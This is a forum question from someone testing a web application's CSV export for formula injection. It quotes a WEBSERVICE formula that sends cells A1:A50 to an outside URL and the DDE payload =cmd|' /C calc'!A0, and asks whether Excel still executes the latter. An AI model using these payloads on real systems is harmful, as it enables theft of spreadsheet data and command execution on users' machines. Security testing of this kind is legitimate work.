windows – Does the CSV injection "= cmd" still exist in 2020?

I am currently testing a web application on which a user can generate a CSV.

I managed to CSV injection data with a payload such as =WEBSERVICE(CONCAT("http://example.com/", CONCAT(A1:A50)

I'm now trying to create a "more dangerous" payload, and I see many references online that use the following:

=cmd|' /C calc'!A0

However, I can't find a way to have such a payload trigger. I always get one #REF! Error. Is such an attack still possible in 2020? Or has Microsoft implemented a mitigation for these attacks?

Excel Version: Excel for Office 365 version 1902